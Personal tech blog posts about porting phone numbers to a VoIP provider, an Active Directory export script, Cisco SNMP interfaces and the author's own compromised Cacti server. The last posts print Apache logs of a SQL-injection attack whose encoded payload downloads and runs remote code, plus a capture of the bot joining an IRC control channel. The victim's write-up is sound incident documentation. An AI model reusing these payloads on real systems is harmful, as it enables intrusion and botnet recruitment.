One week after my port order for my Comcast phone number transferred to Vitelity, Comcast shut down my Internet service. My Comcast voice port line had been dead for a week, and I got home to a dead Internet connection. My Cable modem could pick up an IP but Comcast wouldn't allow it to connect.
I called Comcast customer service and the generally polite customer service rep told me that a port order terminated phone service and Internet service, because it's not possible to activate a Cable modem with voice capabilities with the phone service off. Which is exactly what I had for a week. Customer service rep expressed that Comcast didn't like it when people ported "Comcast's" telephone numbers. Given that Comcast already sued Verizon over the porting telephone numbers difficulty, it's funny.
My only option was to get a new cable modem with no voice ports. After I hooked up the new modem, one call to an also-polite customer service rep got me connected again. I got a new IP, so a quick edit to sip_custom.conf got me connected to Vitelity again.
It was a positive experience, because I feel much freer to switch to whatever ISP I can find that's cheaper. Thus I'm looking at FIOS or DirecTV with a cheap landline for DSL. For those two shows I like to watch on Showtime and HBO, it costs us about $100 a month. Ouch.
What will next month's Comcast bill bring? Credit for terminated phone service? Extra service fees for termination? We'll find out in a month.
Monday, November 10, 2008
Friday, October 31, 2008
Goodbye Comcast Phone Service?
My port order with Vitelity for my Comcast phone number went through. That means, when I dial that number, my pbxinaflash/freepbx/asterisk server gets the call from Vitelity via SIP rather than the Digium 410P FXO card hooked up to the analog port (POTS) of my Comcast DOC device.
While I was able to place Vonage calls after my Vonage number ported through my Vonage ATA, Comcast has cut my phone service off. No calls in our out through the Comcast line.
What remains to be see is if they stop billing me for phone service on my next bill. It would be nice if they just dropped the charge. I'll update here when I get the next bill.
While I was able to place Vonage calls after my Vonage number ported through my Vonage ATA, Comcast has cut my phone service off. No calls in our out through the Comcast line.
What remains to be see is if they stop billing me for phone service on my next bill. It would be nice if they just dropped the charge. I'll update here when I get the next bill.
Tuesday, October 28, 2008
How to dump Vonage and save money.
Four years ago, unlimited domestic long distance service was a deal for $25 month. My Vonage bill had crept up to $37.50 a month with the extra virtual phone number and taxes, fees, and more fees, so I really wanted to dump them. Why pay that much for telemarketers to bug you during dinner? Vonage also had no good blacklist function.
I started looking at Asterisk. Asterisk has gotten much much better about support and stability and there are several third-party appliances available now. By appliance, I mean the download includes an entire OS, generally CentOS 5.2 these days. To name a few: AsteriskNow, FreePBX, PBXInaFlash, Elastix, and TrixBox.
I chose pbxinaflash, just because I liked the blog over at NerdVittles, and it's still free. (I still needed a modest PC and bought an analog card, the Digium TDM410 with one FXS and one FXO. I needed these to get my internal house telephone line lit and connect my Comcast POTS service into the server during the transition period.)
Then I signed up for basic service over at Vitelity. There are other VOIP/SIP trunk providers, but Vitelity worked and has low rates. Once I got my system up and running on the first Vitelity number, I ported over my Vonage number for $18. It took less than a week, compared to the month it took for my Comcast number. My combined savings from Vonage and Comcast will be $60/month for 1.2 cents-a-minute service from Vitelity for $1.49 /month plus 1.2¢ per minute in and 1.44¢ out.
My new service is metered, and that's just fine, because I don't make that many calls from home. (Math: assume $12.50 for inbound, $12.50 for outbound gives me 1041 minutes inbound and 868 minutes outbound, for a total of about 1900 minutes or 32 hours a month of talk time before I hit Vonage-size bills.)
I can also make my Asterisk box do lots of stupid phone tricks, like blacklisting telemarketing phone numbers and getting weather by voice at home.
If you find setting up a Linux appliance intimidating, or you're just not that much of a control freak, you can also buy a Linksys PAP2T-NA for about $50 and Vitelity will support it.
Vonage tried to keep me with a month of free service, but my number was already ported. Goodbye, Vonage! They also tried to charge me a termination fee of $50, which after four years of service didn't apply. Vonage is definitely getting shadier in its billing practices as they get hit with a bad economy and competition.
Update: I built a mini-ITX (small) server for this based on the Intel Atom CPU/Motherboard combo. It worked great, except that the RealTek NIC drivers weren't quite supported in the stock CentOS 5.2 installer. Some quick kernel updates and another temporary NIC got it fixed quickly, but it's not a procedure for the easily frustrated.
I started looking at Asterisk. Asterisk has gotten much much better about support and stability and there are several third-party appliances available now. By appliance, I mean the download includes an entire OS, generally CentOS 5.2 these days. To name a few: AsteriskNow, FreePBX, PBXInaFlash, Elastix, and TrixBox.
I chose pbxinaflash, just because I liked the blog over at NerdVittles, and it's still free. (I still needed a modest PC and bought an analog card, the Digium TDM410 with one FXS and one FXO. I needed these to get my internal house telephone line lit and connect my Comcast POTS service into the server during the transition period.)
Then I signed up for basic service over at Vitelity. There are other VOIP/SIP trunk providers, but Vitelity worked and has low rates. Once I got my system up and running on the first Vitelity number, I ported over my Vonage number for $18. It took less than a week, compared to the month it took for my Comcast number. My combined savings from Vonage and Comcast will be $60/month for 1.2 cents-a-minute service from Vitelity for $1.49 /month plus 1.2¢ per minute in and 1.44¢ out.
My new service is metered, and that's just fine, because I don't make that many calls from home. (Math: assume $12.50 for inbound, $12.50 for outbound gives me 1041 minutes inbound and 868 minutes outbound, for a total of about 1900 minutes or 32 hours a month of talk time before I hit Vonage-size bills.)
I can also make my Asterisk box do lots of stupid phone tricks, like blacklisting telemarketing phone numbers and getting weather by voice at home.
If you find setting up a Linux appliance intimidating, or you're just not that much of a control freak, you can also buy a Linksys PAP2T-NA for about $50 and Vitelity will support it.
Vonage tried to keep me with a month of free service, but my number was already ported. Goodbye, Vonage! They also tried to charge me a termination fee of $50, which after four years of service didn't apply. Vonage is definitely getting shadier in its billing practices as they get hit with a bad economy and competition.
Update: I built a mini-ITX (small) server for this based on the Intel Atom CPU/Motherboard combo. It worked great, except that the RealTek NIC drivers weren't quite supported in the stock CentOS 5.2 installer. Some quick kernel updates and another temporary NIC got it fixed quickly, but it's not a procedure for the easily frustrated.
Wednesday, August 20, 2008
LDIFDE export from list of sAMAccountNames, using vbscript
If you need to export a list of accounts from Active Directory into ldif-format files that will preserve attributes, you can try this. It takes a text list of sAMAccountNames (one per line) and writes out an ldif file for each one. You can easily import the same way by changing the arguments on the exec line and removing the export parameters. You'll also need to fix the line breaks.
'v1.1
' The script will take a text file with usernames (sAMAaccountNames and export them via ldifde to individual files
' named as sAMAccountname.ldf.
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objTextFile = objFSO.OpenTextFile("samaccounts.txt",1)
'On Error Resume Next
Do Until objTextFile.AtEndOfStream
strName = objTextFile.Readline
WScript.Echo "sAMAccountName: " & strName
Set objShell = CreateObject("WScript.Shell")
'you can add/remove attributes from the line below, but be sure to get the quotes right.
Set objScriptExec = objShell.Exec("ldifde -f c:\scripts\export\" & strName & ".ldf -s myDomainController -d ""ou=myOU,ou=Clients,dc=domain,dc=com"" -r ""(sAMAccountName=" & strName & ")"" -l objectclass,dn,c,department,description,displayName,employeeID,extensionAttribute10,extensionAttribute8,extensionAttribute9,givenName,homeDirectory,initials,manager,otherTelephone,physicalDeliveryOfficeName,extension,sn,streetAddress,telephoneNumber,extensionAttribute14,extensionAttribute11,extensionAttribute12,wWWHomePage,sAMAccountName,userPrincipalName,mail,mailnickname,telephoneNumber " )
strResults = objScriptExec.StdOut.ReadAll
WScript.Echo strResults
Loop
set objFile=Nothing
'End
Thursday, September 20, 2007
Cisco MIB: Interfaces on the 3845 Router
Recently I needed to check traffic on specific interfaces of a Cisco 3845 Router. I didn't have a MIB file uploaded to our SNMP workstation, and descriptions of measures were not in synch with the router. Thus I needed to figure out which interface was which. There were 8 valid instances of interface metrics on the router. I was interested in BitsIn/Sec, BitsOut/Sec, and IntSpeed. From IntSpeed, I got the following numbers:
1. 1,000,000,000
2. 1,000,000,000
3. 4,294,967,295
4. 44,736,000
5. 45,000,000
6. 44,736,000
7. 45,000,000
8. 4,294,967,295
Thus I figured out that Serial 0 is 5 and serial 1 is 7. Gig 0 and Gig 1 are 1 and 2. We have two DS-3 circuits (ATT calls them DNECs) in. SNMP may be wonderful but MIBs are a pain. I thought I would write this down before I erase my whiteboard with tomorrow's problem and solution. You can find Cisco's guide to it's MIB and SNMP here.
1. 1,000,000,000
2. 1,000,000,000
3. 4,294,967,295
4. 44,736,000
5. 45,000,000
6. 44,736,000
7. 45,000,000
8. 4,294,967,295
Thus I figured out that Serial 0 is 5 and serial 1 is 7. Gig 0 and Gig 1 are 1 and 2. We have two DS-3 circuits (ATT calls them DNECs) in. SNMP may be wonderful but MIBs are a pain. I thought I would write this down before I erase my whiteboard with tomorrow's problem and solution. You can find Cisco's guide to it's MIB and SNMP here.
Tuesday, May 22, 2007
With some help, I find the vulnerability
Secunia says Cacti has four known vulnerabilities. I had forgotten that I had installed Cacti when I was trying to count the pages I had printed and compare those results those from my HP printer. Same IP as my computer was IRCing to. I should start tracking changes so I can have a record of what was changed, when it was changed, and if I granted myself access.
Here's the log files from apache:
Apparently, that was all it took for my server to be compromised.
Also, I saved the tcpdump from my previous post as an HTML file for people that had trouble with it.
Here's the log files from apache:
213.189.5.233 - - [21/May/2007:14:44:14 -0400] "GET /cacti/ HTTP/1.0" 200 1327 "-" "-"
213.189.5.233 - - [22/May/2007:04:08:21 -0400] "GET /cacti/cmd.php?1+1111)/**/UNION/**/SELECT/**/2,0,1,1,CHAR(49,50,55,46,48,46,48,46,49),null,1,null,null,161,500,CHAR(112,114,111,99),null,1,300,0,CHAR(32,119,103,101,116,32,104,116,116,112,58,47,47,105,99,101,109,97,110,46,109,97,114,116,101,46,114,111,47,103,46,106,112,103,32,45,79,32,47,116,109,112,47,103,46,106,112,103,59,116,97,114,32,120,122,118,102,32,47,116,109,112,47,103,46,106,112,103,32,45,67,32,47,116,109,112,59,47,116,109,112,47,103,111,32,62,32,46,47,114,114,97,47,115,117,110,116,122,117,46,108,111,103),null,null/**/FROM/**/host/*+11111 HTTP/1.0" 200 18 "-" "-"
213.189.5.233 - - [22/May/2007:04:17:07 -0400] "GET /cacti/cmd.php?1+1111)/**/UNION/**/SELECT/**/2,0,1,1,CHAR(49,50,55,46,48,46,48,46,49),null,1,null,null,161,500,CHAR(112,114,111,99),null,1,300,0,CHAR(32,102,101,116,99,104,32,45,111,32,47,116,109,112,47,103,111,46,106,112,103,32,104,116,116,112,58,47,47,105,99,101,109,97,110,46,109,97,114,116,101,46,114,111,47,103,111,46,106,112,103,59,116,97,114,32,120,122,118,102,32,47,116,109,112,47,103,111,46,106,112,103,32,45,67,32,47,116,109,112,59,47,116,109,112,47,103,111,32,62,32,46,47,114,114,97,47,115,117,110,116,122,117,46,108,111,103),null,null/**/FROM/**/host/*+11111 HTTP/1.0" 200 18 "-" "-"
213.189.5.233 - - [22/May/2007:04:17:09 -0400] "GET /cacti/rra/suntzu.log HTTP/1.0" 404 296 "-" "-"
213.189.5.233 - - [22/May/2007:04:17:09 -0400] "GET /cacti/cmd.php?1+1111)/**/UNION/**/SELECT/**/2,0,1,1,CHAR(49,50,55,46,48,46,48,46,49),null,1,null,null,161,500,CHAR(112,114,111,99),null,1,300,0,CHAR(114,109,32,46,47,114,114,97,47,115,117,110,116,122,117,46,108,111,103),null,null/**/FROM/**/host/*+11111 HTTP/1.0" 200 18 "-" "-"
Apparently, that was all it took for my server to be compromised.
Also, I saved the tcpdump from my previous post as an HTML file for people that had trouble with it.
Monday, May 21, 2007
I Catch the Hackers in the Act
IIf you've ever wondered exactly how a vulnerability is exploited, or how botnets happen, check the below. Keep in mind that my system is up-to-date on just about everything I can find to update on it. I've also informed the abuse address of the IP in question about what was going on over a month ago, and the rogue server is still out there, relaying information from compromised Linux servers.
I keep a lot of outbound ports closed so that if one of my servers is compromised, it doesn't become another bot on the net. I finally caught the process again, so I started a capture and then opened the ports. I'm not sure what to make of it because the IP address in question goes back to what appears to be a dedicated server in Italy, but the login information says it's a NASA IRC server. What NASA would be doing on serving IRC to the public is beyond me, unless it's a honeypot. It's probably not a real NASA server, at least that's what I hope. Anyway, here are the fun details of what happens when my server tries to call home to its haxor:
The packet analysis also reveals a clue about the origin of the hack: Mihai is the Romanian version of Michael.
Download the uncensored TCPDump file and see for yourself.
My server: SYN
213.92.118.223 223-118-92-213.serverdedicati.seflow.net ACK
my server: ACK SYN
my server: ...i
my server: NICK a3sh-.
my server: ....
my server: FF 86 C5 CD
my server: ....
my server: USER nh2ies x.x.x.x 213.92.118.223 :Linux mrtg.sampas.net 2.6.9-42.0.10.ELsmp #1 SMP Fri Feb 16 17:17:21 EST 2007 i686 i686 i386 GNU/Linux.
my server: ....
my server: PONG :1041065789.
my server: (ACK)
my server: NICK a3sh-685.
my server: JOIN #mihai.
46 a3sh-6682 a3sh-8430 a3sh-700 a3sh-4929 a3sh-9957 a3sh-9284 a3sh-1775 +a3sh-3250 a3sh-2594 a3sh-3037 a3sh-3353 a3sh-2931 a3sh-366 a3sh-934 a3sh-1772 a3sh-8760 a3sh-7777..:www.nasa.gov 353 a3sh-685 = #mihai :a3sh-8519 a3sh-8691 a3sh-9382 a3sh-3749 a3sh-8126 a3sh-5627 a3sh-1038 a3sh-3316 a3sh-5240 a3sh-379 a3sh-6854 a3sh-9518 a3sh-1493 a3sh-7073 a3sh-9670 +a3sh-3201 a3sh-7933 a3sh-4989 a3sh-960 a3sh-3584 a3sh-7571 a3sh-9905 a3sh-6198 a3sh-9436 a3sh-7021 a3sh-9951 a3sh-43 a3sh-1578 @a3sh-..:www.nasa.gov 366 a3sh-685 #mihai :End of /NAMES list...
I keep a lot of outbound ports closed so that if one of my servers is compromised, it doesn't become another bot on the net. I finally caught the process again, so I started a capture and then opened the ports. I'm not sure what to make of it because the IP address in question goes back to what appears to be a dedicated server in Italy, but the login information says it's a NASA IRC server. What NASA would be doing on serving IRC to the public is beyond me, unless it's a honeypot. It's probably not a real NASA server, at least that's what I hope. Anyway, here are the fun details of what happens when my server tries to call home to its haxor:
The packet analysis also reveals a clue about the origin of the hack: Mihai is the Romanian version of Michael.
Download the uncensored TCPDump file and see for yourself.
My server: SYN
213.92.118.223 223-118-92-213.serverdedicati.seflow.net ACK
my server: ACK SYN
my server: ...i
my server: NICK a3sh-.
my server: ....
my server: FF 86 C5 CD
my server: ....
my server: USER nh2ies x.x.x.x 213.92.118.223 :Linux mrtg.sampas.net 2.6.9-42.0.10.ELsmp #1 SMP Fri Feb 16 17:17:21 EST 2007 i686 i686 i386 GNU/Linux.
my server: ....
my server: PONG :1041065789.
my server: (ACK)
my server: NICK a3sh-685.
my server: JOIN #mihai.
46 a3sh-6682 a3sh-8430 a3sh-700 a3sh-4929 a3sh-9957 a3sh-9284 a3sh-1775 +a3sh-3250 a3sh-2594 a3sh-3037 a3sh-3353 a3sh-2931 a3sh-366 a3sh-934 a3sh-1772 a3sh-8760 a3sh-7777..:www.nasa.gov 353 a3sh-685 = #mihai :a3sh-8519 a3sh-8691 a3sh-9382 a3sh-3749 a3sh-8126 a3sh-5627 a3sh-1038 a3sh-3316 a3sh-5240 a3sh-379 a3sh-6854 a3sh-9518 a3sh-1493 a3sh-7073 a3sh-9670 +a3sh-3201 a3sh-7933 a3sh-4989 a3sh-960 a3sh-3584 a3sh-7571 a3sh-9905 a3sh-6198 a3sh-9436 a3sh-7021 a3sh-9951 a3sh-43 a3sh-1578 @a3sh-..:www.nasa.gov 366 a3sh-685 #mihai :End of /NAMES list...
Subscribe to:
Posts (Atom)